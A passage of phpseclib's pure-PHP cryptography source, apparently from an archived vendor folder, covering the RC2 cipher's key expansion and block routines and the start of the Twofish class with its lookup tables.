0x90, 0xEF, 0x3E, 0xE7, 0x06, 0xC3, 0xD5, 0x2F, 0xC8, 0x66, 0x1E, 0xD7, 0x08, 0xE8, 0xEA, 0xDE, 0x80, 0x52, 0xEE, 0xF7, 0x84, 0xAA, 0x72, 0xAC, 0x35, 0x4D, 0x6A, 0x2A, 0x96, 0x1A, 0xD2, 0x71, 0x5A, 0x15, 0x49, 0x74, 0x4B, 0x9F, 0xD0, 0x5E, 0x04, 0x18, 0xA4, 0xEC, 0xC2, 0xE0, 0x41, 0x6E, 0x0F, 0x51, 0xCB, 0xCC, 0x24, 0x91, 0xAF, 0x50, 0xA1, 0xF4, 0x70, 0x39, 0x99, 0x7C, 0x3A, 0x85, 0x23, 0xB8, 0xB4, 0x7A, 0xFC, 0x02, 0x36, 0x5B, 0x25, 0x55, 0x97, 0x31, 0x2D, 0x5D, 0xFA, 0x98, 0xE3, 0x8A, 0x92, 0xAE, 0x05, 0xDF, 0x29, 0x10, 0x67, 0x6C, 0xBA, 0xC9, 0xD3, 0x00, 0xE6, 0xCF, 0xE1, 0x9E, 0xA8, 0x2C, 0x63, 0x16, 0x01, 0x3F, 0x58, 0xE2, 0x89, 0xA9, 0x0D, 0x38, 0x34, 0x1B, 0xAB, 0x33, 0xFF, 0xB0, 0xBB, 0x48, 0x0C, 0x5F, 0xB9, 0xB1, 0xCD, 0x2E, 0xC5, 0xF3, 0xDB, 0x47, 0xE5, 0xA5, 0x9C, 0x77, 0x0A, 0xA6, 0x20, 0x68, 0xFE, 0x7F, 0xC1, 0xAD ]; /** * Inverse key expansion randomization table. * * @see self::setKey() * @var array */ private static $invpitable = [ 0xD1, 0xDA, 0xB9, 0x6F, 0x9C, 0xC8, 0x78, 0x66, 0x80, 0x2C, 0xF8, 0x37, 0xEA, 0xE0, 0x62, 0xA4, 0xCB, 0x71, 0x50, 0x27, 0x4B, 0x95, 0xD9, 0x20, 0x9D, 0x04, 0x91, 0xE3, 0x47, 0x6A, 0x7E, 0x53, 0xFA, 0x3A, 0x3B, 0xB4, 0xA8, 0xBC, 0x5F, 0x68, 0x08, 0xCA, 0x8F, 0x14, 0xD7, 0xC0, 0xEF, 0x7B, 0x5B, 0xBF, 0x2F, 0xE5, 0xE2, 0x8C, 0xBA, 0x12, 0xE1, 0xAF, 0xB2, 0x54, 0x5D, 0x59, 0x76, 0xDB, 0x32, 0xA2, 0x58, 0x6E, 0x1C, 0x29, 0x64, 0xF3, 0xE9, 0x96, 0x0C, 0x98, 0x19, 0x8D, 0x3E, 0x26, 0xAB, 0xA5, 0x85, 0x16, 0x40, 0xBD, 0x49, 0x67, 0xDC, 0x22, 0x94, 0xBB, 0x3C, 0xC1, 0x9B, 0xEB, 0x45, 0x28, 0x18, 0xD8, 0x1A, 0x42, 0x7D, 0xCC, 0xFB, 0x65, 0x8E, 0x3D, 0xCD, 0x2A, 0xA3, 0x60, 0xAE, 0x93, 0x8A, 0x48, 0x97, 0x51, 0x15, 0xF7, 0x01, 0x0B, 0xB7, 0x36, 0xB1, 0x2E, 0x11, 0xFD, 0x84, 0x2D, 0x3F, 0x13, 0x88, 0xB3, 0x34, 0x24, 0x1B, 0xDE, 0xC5, 0x1D, 0x4D, 0x2B, 0x17, 0x31, 0x74, 0xA9, 0xC6, 0x43, 0x6D, 0x39, 0x90, 0xBE, 0xC3, 0xB0, 0x21, 0x6B, 0xF6, 0x0F, 0xD5, 0x99, 0x0D, 0xAC, 0x1F, 0x5C, 0x9E, 0xF5, 0xF9, 0x4C, 0xD6, 0xDF, 0x89, 0xE4, 0x8B, 0xFF, 0xC7, 0xAA, 0xE7, 0xED, 0x46, 0x25, 0xB6, 0x06, 0x5E, 0x35, 0xB5, 0xEC, 0xCE, 0xE8, 0x6C, 0x30, 0x55, 0x61, 0x4A, 0xFE, 0xA0, 0x79, 0x03, 0xF0, 0x10, 0x72, 0x7C, 0xCF, 0x52, 0xA6, 0xA7, 0xEE, 0x44, 0xD3, 0x9A, 0x57, 0x92, 0xD0, 0x5A, 0x7A, 0x41, 0x7F, 0x0E, 0x00, 0x63, 0xF2, 0x4F, 0x05, 0x83, 0xC9, 0xA1, 0xD4, 0xDD, 0xC4, 0x56, 0xF4, 0xD2, 0x77, 0x81, 0x09, 0x82, 0x33, 0x9F, 0x07, 0x86, 0x75, 0x38, 0x4E, 0x69, 0xF1, 0xAD, 0x23, 0x73, 0x87, 0x70, 0x02, 0xC2, 0x1E, 0xB8, 0x0A, 0xFC, 0xE6 ]; /** * Default Constructor. * * @param string $mode * @throws \InvalidArgumentException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { switch ($engine) { case self::ENGINE_OPENSSL: if ($this->current_key_length != 128 || strlen($this->orig_key) < 16) { return false; } // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (defined('OPENSSL_VERSION_TEXT') && version_compare(preg_replace('#OpenSSL (\d+\.\d+\.\d+) .*#', '$1', OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return false; } $this->cipher_name_openssl_ecb = 'rc2-ecb'; $this->cipher_name_openssl = 'rc2-' . $this->openssl_translate_mode(); } return parent::isValidEngineHelper($engine); } /** * Sets the key length. * * Valid key lengths are 8 to 1024. * Calling this function after setting the key has no effect until the next * \phpseclib3\Crypt\RC2::setKey() call. * * @param int $length in bits * @throws \LengthException if the key length isn't supported */ public function setKeyLength($length) { if ($length < 8 || $length > 1024) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys between 1 and 1024 bits, inclusive, are supported'); } $this->default_key_length = $this->current_key_length = $length; $this->explicit_key_length = $length >> 3; } /** * Returns the current key length * * @return int */ public function getKeyLength() { return $this->current_key_length; } /** * Sets the key. * * Keys can be of any length. RC2, itself, uses 8 to 1024 bit keys (eg. * strlen($key) <= 128), however, we only use the first 128 bytes if $key * has more then 128 bytes in it, and set $key to a single null byte if * it is empty. * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey() * @param string $key * @param int|boolean $t1 optional Effective key length in bits. * @throws \LengthException if the key length isn't supported */ public function setKey($key, $t1 = false) { $this->orig_key = $key; if ($t1 === false) { $t1 = $this->default_key_length; } if ($t1 < 1 || $t1 > 1024) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys between 1 and 1024 bits, inclusive, are supported'); } $this->current_key_length = $t1; if (strlen($key) < 1 || strlen($key) > 128) { throw new \LengthException('Key of size ' . strlen($key) . ' not supported by this algorithm. Only keys of sizes between 8 and 1024 bits, inclusive, are supported'); } $t = strlen($key); // The mcrypt RC2 implementation only supports effective key length // of 1024 bits. It is however possible to handle effective key // lengths in range 1..1024 by expanding the key and applying // inverse pitable mapping to the first byte before submitting it // to mcrypt. // Key expansion. $l = array_values(unpack('C*', $key)); $t8 = ($t1 + 7) >> 3; $tm = 0xFF >> (8 * $t8 - $t1); // Expand key. $pitable = self::$pitable; for ($i = $t; $i < 128; $i++) { $l[$i] = $pitable[$l[$i - 1] + $l[$i - $t]]; } $i = 128 - $t8; $l[$i] = $pitable[$l[$i] & $tm]; while ($i--) { $l[$i] = $pitable[$l[$i + 1] ^ $l[$i + $t8]]; } // Prepare the key for mcrypt. $l[0] = self::$invpitable[$l[0]]; array_unshift($l, 'C*'); $this->key = pack(...$l); $this->key_length = strlen($this->key); $this->changed = $this->nonIVChanged = true; $this->setEngine(); } /** * Encrypts a message. * * Mostly a wrapper for \phpseclib3\Crypt\Common\SymmetricKey::encrypt, with some additional OpenSSL handling code * * @see self::decrypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { if ($this->engine == self::ENGINE_OPENSSL) { $temp = $this->key; $this->key = $this->orig_key; $result = parent::encrypt($plaintext); $this->key = $temp; return $result; } return parent::encrypt($plaintext); } /** * Decrypts a message. * * Mostly a wrapper for \phpseclib3\Crypt\Common\SymmetricKey::decrypt, with some additional OpenSSL handling code * * @see self::encrypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if ($this->engine == self::ENGINE_OPENSSL) { $temp = $this->key; $this->key = $this->orig_key; $result = parent::decrypt($ciphertext); $this->key = $temp; return $result; } return parent::decrypt($ciphertext); } /** * Encrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::encryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @param string $in * @return string */ protected function encryptBlock($in) { list($r0, $r1, $r2, $r3) = array_values(unpack('v*', $in)); $keys = $this->keys; $limit = 20; $actions = [$limit => 44, 44 => 64]; $j = 0; for (;;) { // Mixing round. $r0 = (($r0 + $keys[$j++] + ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF) << 1; $r0 |= $r0 >> 16; $r1 = (($r1 + $keys[$j++] + ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF) << 2; $r1 |= $r1 >> 16; $r2 = (($r2 + $keys[$j++] + ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF) << 3; $r2 |= $r2 >> 16; $r3 = (($r3 + $keys[$j++] + ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF) << 5; $r3 |= $r3 >> 16; if ($j === $limit) { if ($limit === 64) { break; } // Mashing round. $r0 += $keys[$r3 & 0x3F]; $r1 += $keys[$r0 & 0x3F]; $r2 += $keys[$r1 & 0x3F]; $r3 += $keys[$r2 & 0x3F]; $limit = $actions[$limit]; } } return pack('vvvv', $r0, $r1, $r2, $r3); } /** * Decrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::decryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @param string $in * @return string */ protected function decryptBlock($in) { list($r0, $r1, $r2, $r3) = array_values(unpack('v*', $in)); $keys = $this->keys; $limit = 44; $actions = [$limit => 20, 20 => 0]; $j = 64; for (;;) { // R-mixing round. $r3 = ($r3 | ($r3 << 16)) >> 5; $r3 = ($r3 - $keys[--$j] - ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF; $r2 = ($r2 | ($r2 << 16)) >> 3; $r2 = ($r2 - $keys[--$j] - ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF; $r1 = ($r1 | ($r1 << 16)) >> 2; $r1 = ($r1 - $keys[--$j] - ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF; $r0 = ($r0 | ($r0 << 16)) >> 1; $r0 = ($r0 - $keys[--$j] - ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF; if ($j === $limit) { if ($limit === 0) { break; } // R-mashing round. $r3 = ($r3 - $keys[$r2 & 0x3F]) & 0xFFFF; $r2 = ($r2 - $keys[$r1 & 0x3F]) & 0xFFFF; $r1 = ($r1 - $keys[$r0 & 0x3F]) & 0xFFFF; $r0 = ($r0 - $keys[$r3 & 0x3F]) & 0xFFFF; $limit = $actions[$limit]; } } return pack('vvvv', $r0, $r1, $r2, $r3); } /** * Creates the key schedule * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { if (!isset($this->key)) { $this->setKey(''); } // Key has already been expanded in \phpseclib3\Crypt\RC2::setKey(): // Only the first value must be altered. $l = unpack('Ca/Cb/v*', $this->key); array_unshift($l, self::$pitable[$l['a']] | ($l['b'] << 8)); unset($l['a']); unset($l['b']); $this->keys = $l; } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt() */ protected function setupInlineCrypt() { // Init code for both, encrypt and decrypt. $init_crypt = '$keys = $this->keys;'; $keys = $this->keys; // $in is the current 8 bytes block which has to be en/decrypt $encrypt_block = $decrypt_block = ' $in = unpack("v4", $in); $r0 = $in[1]; $r1 = $in[2]; $r2 = $in[3]; $r3 = $in[4]; '; // Create code for encryption. $limit = 20; $actions = [$limit => 44, 44 => 64]; $j = 0; for (;;) { // Mixing round. $encrypt_block .= ' $r0 = (($r0 + ' . $keys[$j++] . ' + ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF) << 1; $r0 |= $r0 >> 16; $r1 = (($r1 + ' . $keys[$j++] . ' + ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF) << 2; $r1 |= $r1 >> 16; $r2 = (($r2 + ' . $keys[$j++] . ' + ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF) << 3; $r2 |= $r2 >> 16; $r3 = (($r3 + ' . $keys[$j++] . ' + ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF) << 5; $r3 |= $r3 >> 16;'; if ($j === $limit) { if ($limit === 64) { break; } // Mashing round. $encrypt_block .= ' $r0 += $keys[$r3 & 0x3F]; $r1 += $keys[$r0 & 0x3F]; $r2 += $keys[$r1 & 0x3F]; $r3 += $keys[$r2 & 0x3F];'; $limit = $actions[$limit]; } } $encrypt_block .= '$in = pack("v4", $r0, $r1, $r2, $r3);'; // Create code for decryption. $limit = 44; $actions = [$limit => 20, 20 => 0]; $j = 64; for (;;) { // R-mixing round. $decrypt_block .= ' $r3 = ($r3 | ($r3 << 16)) >> 5; $r3 = ($r3 - ' . $keys[--$j] . ' - ((($r0 ^ $r1) & $r2) ^ $r0)) & 0xFFFF; $r2 = ($r2 | ($r2 << 16)) >> 3; $r2 = ($r2 - ' . $keys[--$j] . ' - ((($r3 ^ $r0) & $r1) ^ $r3)) & 0xFFFF; $r1 = ($r1 | ($r1 << 16)) >> 2; $r1 = ($r1 - ' . $keys[--$j] . ' - ((($r2 ^ $r3) & $r0) ^ $r2)) & 0xFFFF; $r0 = ($r0 | ($r0 << 16)) >> 1; $r0 = ($r0 - ' . $keys[--$j] . ' - ((($r1 ^ $r2) & $r3) ^ $r1)) & 0xFFFF;'; if ($j === $limit) { if ($limit === 0) { break; } // R-mashing round. $decrypt_block .= ' $r3 = ($r3 - $keys[$r2 & 0x3F]) & 0xFFFF; $r2 = ($r2 - $keys[$r1 & 0x3F]) & 0xFFFF; $r1 = ($r1 - $keys[$r0 & 0x3F]) & 0xFFFF; $r0 = ($r0 - $keys[$r3 & 0x3F]) & 0xFFFF;'; $limit = $actions[$limit]; } } $decrypt_block .= '$in = pack("v4", $r0, $r1, $r2, $r3);'; // Creates the inline-crypt function $this->inline_crypt = $this->createInlineCryptFunction( [ 'init_crypt' => $init_crypt, 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block ] ); } } google-api/vendor/phpseclib/phpseclib/phpseclib/Crypt/Twofish.php000064400000110550147600400120021210 0ustar00 * setKey('12345678901234567890123456789012'); * * $plaintext = str_repeat('a', 1024); * * echo $twofish->decrypt($twofish->encrypt($plaintext)); * ?> * * * @author Jim Wigginton * @author Hans-Juergen Petrich * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Crypt; use phpseclib3\Crypt\Common\BlockCipher; use phpseclib3\Exception\BadModeException; /** * Pure-PHP implementation of Twofish. * * @author Jim Wigginton * @author Hans-Juergen Petrich */ class Twofish extends BlockCipher { /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'twofish'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 800; /** * Q-Table * * @var array */ private static $q0 = [ 0xA9, 0x67, 0xB3, 0xE8, 0x04, 0xFD, 0xA3, 0x76, 0x9A, 0x92, 0x80, 0x78, 0xE4, 0xDD, 0xD1, 0x38, 0x0D, 0xC6, 0x35, 0x98, 0x18, 0xF7, 0xEC, 0x6C, 0x43, 0x75, 0x37, 0x26, 0xFA, 0x13, 0x94, 0x48, 0xF2, 0xD0, 0x8B, 0x30, 0x84, 0x54, 0xDF, 0x23, 0x19, 0x5B, 0x3D, 0x59, 0xF3, 0xAE, 0xA2, 0x82, 0x63, 0x01, 0x83, 0x2E, 0xD9, 0x51, 0x9B, 0x7C, 0xA6, 0xEB, 0xA5, 0xBE, 0x16, 0x0C, 0xE3, 0x61, 0xC0, 0x8C, 0x3A, 0xF5, 0x73, 0x2C, 0x25, 0x0B, 0xBB, 0x4E, 0x89, 0x6B, 0x53, 0x6A, 0xB4, 0xF1, 0xE1, 0xE6, 0xBD, 0x45, 0xE2, 0xF4, 0xB6, 0x66, 0xCC, 0x95, 0x03, 0x56, 0xD4, 0x1C, 0x1E, 0xD7, 0xFB, 0xC3, 0x8E, 0xB5, 0xE9, 0xCF, 0xBF, 0xBA, 0xEA, 0x77, 0x39, 0xAF, 0x33, 0xC9, 0x62, 0x71, 0x81, 0x79, 0x09, 0xAD, 0x24, 0xCD, 0xF9, 0xD8, 0xE5, 0xC5, 0xB9, 0x4D, 0x44, 0x08, 0x86, 0xE7, 0xA1, 0x1D, 0xAA, 0xED, 0x06, 0x70, 0xB2, 0xD2, 0x41, 0x7B, 0xA0, 0x11, 0x31, 0xC2, 0x27, 0x90, 0x20, 0xF6, 0x60, 0xFF, 0x96, 0x5C, 0xB1, 0xAB, 0x9E, 0x9C, 0x52, 0x1B, 0x5F, 0x93, 0x0A, 0xEF, 0x91, 0x85, 0x49, 0xEE, 0x2D, 0x4F, 0x8F, 0x3B, 0x47, 0x87, 0x6D, 0x46, 0xD6, 0x3E, 0x69, 0x64, 0x2A, 0xCE, 0xCB, 0x2F, 0xFC, 0x97, 0x05, 0x7A, 0xAC, 0x7F, 0xD5, 0x1A, 0x4B, 0x0E, 0xA7, 0x5A, 0x28, 0x14, 0x3F, 0x29, 0x88, 0x3C, 0x4C, 0x02, 0xB8, 0xDA, 0xB0, 0x17, 0x55, 0x1F, 0x8A, 0x7D, 0x57, 0xC7, 0x8D, 0x74, 0xB7, 0xC4, 0x9F, 0x72, 0x7E, 0x15, 0x22, 0x12, 0x58, 0x07, 0x99, 0x34, 0x6E, 0x50, 0xDE, 0x68, 0x65, 0xBC, 0xDB, 0xF8, 0xC8, 0xA8, 0x2B, 0x40, 0xDC, 0xFE, 0x32, 0xA4, 0xCA, 0x10, 0x21, 0xF0, 0xD3, 0x5D, 0x0F, 0x00, 0x6F, 0x9D, 0x36, 0x42, 0x4A, 0x5E, 0xC1, 0xE0 ]; /** * Q-Table * * @var array */ private static $q1 = [ 0x75, 0xF3, 0xC6, 0xF4, 0xDB, 0x7B, 0xFB, 0xC8, 0x4A, 0xD3, 0xE6, 0x6B, 0x45, 0x7D, 0xE8, 0x4B, 0xD6, 0x32, 0xD8, 0xFD, 0x37, 0x71, 0xF1, 0xE1, 0x30, 0x0F, 0xF8, 0x1B, 0x87, 0xFA, 0x06, 0x3F, 0x5E, 0xBA, 0xAE, 0x5B, 0x8A, 0x00, 0xBC, 0x9D, 0x6D, 0xC1, 0xB1, 0x0E, 0x80, 0x5D, 0xD2, 0xD5, 0xA0, 0x84, 0x07, 0x14, 0xB5, 0x90, 0x2C, 0xA3, 0xB2, 0x73, 0x4C, 0x54, 0x92, 0x74, 0x36, 0x51, 0x38, 0xB0, 0xBD, 0x5A, 0xFC, 0x60, 0x62, 0x96, 0x6C, 0x42, 0xF7, 0x10, 0x7C, 0x28, 0x27, 0x8C, 0x13, 0x95, 0x9C, 0xC7, 0x24, 0x46, 0x3B, 0x70, 0xCA, 0xE3, 0x85, 0xCB, 0x11, 0xD0, 0x93, 0xB8, 0xA6, 0x83, 0x20, 0xFF, 0x9F, 0x77, 0xC3, 0xCC, 0x03, 0x6F, 0x08, 0xBF, 0x40, 0xE7, 0x2B, 0xE2, 0x79, 0x0C, 0xAA, 0x82, 0x41, 0x3A, 0xEA, 0xB9, 0xE4, 0x9A, 0xA4, 0x97, 0x7E, 0xDA, 0x7A, 0x17, 0x66, 0x94, 0xA1, 0x1D, 0x3D, 0xF0, 0xDE, 0xB3, 0x0B, 0x72, 0xA7, 0x1C, 0xEF, 0xD1, 0x53, 0x3E, 0x8F, 0x33, 0x26, 0x5F, 0xEC, 0x76, 0x2A, 0x49, 0x81, 0x88, 0xEE, 0x21, 0xC4, 0x1A, 0xEB, 0xD9, 0xC5, 0x39, 0x99, 0xCD, 0xAD, 0x31, 0x8B, 0x01, 0x18, 0x23, 0xDD, 0x1F, 0x4E, 0x2D, 0xF9, 0x48, 0x4F, 0xF2, 0x65, 0x8E, 0x78, 0x5C, 0x58, 0x19, 0x8D, 0xE5, 0x98, 0x57, 0x67, 0x7F, 0x05, 0x64, 0xAF, 0x63, 0xB6, 0xFE, 0xF5, 0xB7, 0x3C, 0xA5, 0xCE, 0xE9, 0x68, 0x44, 0xE0, 0x4D, 0x43, 0x69, 0x29, 0x2E, 0xAC, 0x15, 0x59, 0xA8, 0x0A, 0x9E, 0x6E, 0x47, 0xDF, 0x34, 0x35, 0x6A, 0xCF, 0xDC, 0x22, 0xC9, 0xC0, 0x9B, 0x89, 0xD4, 0xED, 0xAB, 0x12, 0xA2, 0x0D, 0x52, 0xBB, 0x02, 0x2F, 0xA9, 0xD7, 0x61, 0x1E, 0xB4, 0x50, 0x04, 0xF6, 0xC2, 0x16, 0x25, 0x86, 0x56, 0x55, 0x09, 0xBE, 0x91 ]; /** * M-Table * * @var array */ private static $m0 = [ 0xBCBC3275, 0xECEC21F3, 0x202043C6, 0xB3B3C9F4, 0xDADA03DB, 0x02028B7B, 0xE2E22BFB, 0x9E9EFAC8, 0xC9C9EC4A, 0xD4D409D3, 0x18186BE6, 0x1E1E9F6B, 0x98980E45, 0xB2B2387D, 0xA6A6D2E8, 0x2626B74B, 0x3C3C57D6, 0x93938A32, 0x8282EED8, 0x525298FD, 0x7B7BD437, 0xBBBB3771, 0x5B5B97F1, 0x474783E1, 0x24243C30, 0x5151E20F, 0xBABAC6F8, 0x4A4AF31B, 0xBFBF4887, 0x0D0D70FA, 0xB0B0B306, 0x7575DE3F, 0xD2D2FD5E, 0x7D7D20BA, 0x666631AE, 0x3A3AA35B, 0x59591C8A, 0x00000000, 0xCDCD93BC, 0x1A1AE09D, 0xAEAE2C6D, 0x7F7FABC1, 0x2B2BC7B1, 0xBEBEB90E, 0xE0E0A080, 0x8A8A105D, 0x3B3B52D2, 0x6464BAD5, 0xD8D888A0, 0xE7E7A584, 0x5F5FE807, 0x1B1B1114, 0x2C2CC2B5, 0xFCFCB490, 0x3131272C, 0x808065A3, 0x73732AB2, 0x0C0C8173, 0x79795F4C, 0x6B6B4154, 0x4B4B0292, 0x53536974, 0x94948F36, 0x83831F51, 0x2A2A3638, 0xC4C49CB0, 0x2222C8BD, 0xD5D5F85A, 0xBDBDC3FC, 0x48487860, 0xFFFFCE62, 0x4C4C0796, 0x4141776C, 0xC7C7E642, 0xEBEB24F7, 0x1C1C1410, 0x5D5D637C, 0x36362228, 0x6767C027, 0xE9E9AF8C, 0x4444F913, 0x1414EA95, 0xF5F5BB9C, 0xCFCF18C7, 0x3F3F2D24, 0xC0C0E346, 0x7272DB3B, 0x54546C70, 0x29294CCA, 0xF0F035E3, 0x0808FE85, 0xC6C617CB, 0xF3F34F11, 0x8C8CE4D0, 0xA4A45993, 0xCACA96B8, 0x68683BA6, 0xB8B84D83, 0x38382820, 0xE5E52EFF, 0xADAD569F, 0x0B0B8477, 0xC8C81DC3, 0x9999FFCC, 0x5858ED03, 0x19199A6F, 0x0E0E0A08, 0x95957EBF, 0x70705040, 0xF7F730E7, 0x6E6ECF2B, 0x1F1F6EE2, 0xB5B53D79, 0x09090F0C, 0x616134AA, 0x57571682, 0x9F9F0B41, 0x9D9D803A, 0x111164EA, 0x2525CDB9, 0xAFAFDDE4, 0x4545089A, 0xDFDF8DA4, 0xA3A35C97, 0xEAEAD57E, 0x353558DA, 0xEDEDD07A, 0x4343FC17, 0xF8F8CB66, 0xFBFBB194, 0x3737D3A1, 0xFAFA401D, 0xC2C2683D, 0xB4B4CCF0, 0x32325DDE, 0x9C9C71B3, 0x5656E70B, 0xE3E3DA72, 0x878760A7, 0x15151B1C, 0xF9F93AEF, 0x6363BFD1, 0x3434A953, 0x9A9A853E, 0xB1B1428F, 0x7C7CD133, 0x88889B26, 0x3D3DA65F, 0xA1A1D7EC, 0xE4E4DF76, 0x8181942A, 0x91910149, 0x0F0FFB81, 0xEEEEAA88, 0x161661EE, 0xD7D77321, 0x9797F5C4, 0xA5A5A81A, 0xFEFE3FEB, 0x6D6DB5D9, 0x7878AEC5, 0xC5C56D39, 0x1D1DE599, 0x7676A4CD, 0x3E3EDCAD, 0xCBCB6731, 0xB6B6478B, 0xEFEF5B01, 0x12121E18, 0x6060C523, 0x6A6AB0DD, 0x4D4DF61F, 0xCECEE94E, 0xDEDE7C2D, 0x55559DF9, 0x7E7E5A48, 0x2121B24F, 0x03037AF2, 0xA0A02665, 0x5E5E198E, 0x5A5A6678, 0x65654B5C, 0x62624E58, 0xFDFD4519, 0x0606F48D, 0x404086E5, 0xF2F2BE98, 0x3333AC57, 0x17179067, 0x05058E7F, 0xE8E85E05, 0x4F4F7D64, 0x89896AAF, 0x10109563, 0x74742FB6, 0x0A0A75FE, 0x5C5C92F5, 0x9B9B74B7, 0x2D2D333C, 0x3030D6A5, 0x2E2E49CE, 0x494989E9, 0x46467268, 0x77775544, 0xA8A8D8E0, 0x9696044D, 0x2828BD43, 0xA9A92969, 0xD9D97929, 0x8686912E, 0xD1D187AC, 0xF4F44A15, 0x8D8D1559, 0xD6D682A8, 0xB9B9BC0A, 0x42420D9E, 0xF6F6C16E, 0x2F2FB847, 0xDDDD06DF, 0x23233934, 0xCCCC6235, 0xF1F1C46A, 0xC1C112CF, 0x8585EBDC, 0x8F8F9E22, 0x7171A1C9, 0x9090F0C0, 0xAAAA539B, 0x0101F189, 0x8B8BE1D4, 0x4E4E8CED, 0x8E8E6FAB, 0xABABA212, 0x6F6F3EA2, 0xE6E6540D, 0xDBDBF252, 0x92927BBB, 0xB7B7B602, 0x6969CA2F, 0x3939D9A9, 0xD3D30CD7, 0xA7A72361, 0xA2A2AD1E, 0xC3C399B4, 0x6C6C4450, 0x07070504, 0x04047FF6, 0x272746C2, 0xACACA716, 0xD0D07625, 0x50501386, 0xDCDCF756, 0x84841A55, 0xE1E15109, 0x7A7A25BE, 0x1313EF91 ]; /** * M-Table * * @var array */ private static $m1 = [ 0xA9D93939, 0x67901717, 0xB3719C9C, 0xE8D2A6A6, 0x04050707, 0xFD985252, 0xA3658080, 0x76DFE4E4, 0x9A084545, 0x92024B4B, 0x80A0E0E0, 0x78665A5A, 0xE4DDAFAF, 0xDDB06A6A, 0xD1BF6363, 0x38362A2A, 0x0D54E6E6, 0xC6432020, 0x3562CCCC, 0x98BEF2F2, 0x181E1212, 0xF724EBEB, 0xECD7A1A1, 0x6C774141, 0x43BD2828, 0x7532BCBC, 0x37D47B7B, 0x269B8888, 0xFA700D0D, 0x13F94444, 0x94B1FBFB, 0x485A7E7E, 0xF27A0303, 0xD0E48C8C, 0x8B47B6B6, 0x303C2424, 0x84A5E7E7, 0x54416B6B, 0xDF06DDDD, 0x23C56060, 0x1945FDFD, 0x5BA33A3A, 0x3D68C2C2, 0x59158D8D, 0xF321ECEC, 0xAE316666, 0xA23E6F6F, 0x82165757, 0x63951010, 0x015BEFEF, 0x834DB8B8, 0x2E918686, 0xD9B56D6D, 0x511F8383, 0x9B53AAAA, 0x7C635D5D, 0xA63B6868, 0xEB3FFEFE, 0xA5D63030, 0xBE257A7A, 0x16A7ACAC, 0x0C0F0909, 0xE335F0F0, 0x6123A7A7, 0xC0F09090, 0x8CAFE9E9, 0x3A809D9D, 0xF5925C5C, 0x73810C0C, 0x2C273131, 0x2576D0D0, 0x0BE75656, 0xBB7B9292, 0x4EE9CECE, 0x89F10101, 0x6B9F1E1E, 0x53A93434, 0x6AC4F1F1, 0xB499C3C3, 0xF1975B5B, 0xE1834747, 0xE66B1818, 0xBDC82222, 0x450E9898, 0xE26E1F1F, 0xF4C9B3B3, 0xB62F7474, 0x66CBF8F8, 0xCCFF9999, 0x95EA1414, 0x03ED5858, 0x56F7DCDC, 0xD4E18B8B, 0x1C1B1515, 0x1EADA2A2, 0xD70CD3D3, 0xFB2BE2E2, 0xC31DC8C8, 0x8E195E5E, 0xB5C22C2C, 0xE9894949, 0xCF12C1C1, 0xBF7E9595, 0xBA207D7D, 0xEA641111, 0x77840B0B, 0x396DC5C5, 0xAF6A8989, 0x33D17C7C, 0xC9A17171, 0x62CEFFFF, 0x7137BBBB, 0x81FB0F0F, 0x793DB5B5, 0x0951E1E1, 0xADDC3E3E, 0x242D3F3F, 0xCDA47676, 0xF99D5555, 0xD8EE8282, 0xE5864040, 0xC5AE7878, 0xB9CD2525, 0x4D049696, 0x44557777, 0x080A0E0E, 0x86135050, 0xE730F7F7, 0xA1D33737, 0x1D40FAFA, 0xAA346161, 0xED8C4E4E, 0x06B3B0B0, 0x706C5454, 0xB22A7373, 0xD2523B3B, 0x410B9F9F, 0x7B8B0202, 0xA088D8D8, 0x114FF3F3, 0x3167CBCB, 0xC2462727, 0x27C06767, 0x90B4FCFC, 0x20283838, 0xF67F0404, 0x60784848, 0xFF2EE5E5, 0x96074C4C, 0x5C4B6565, 0xB1C72B2B, 0xAB6F8E8E, 0x9E0D4242, 0x9CBBF5F5, 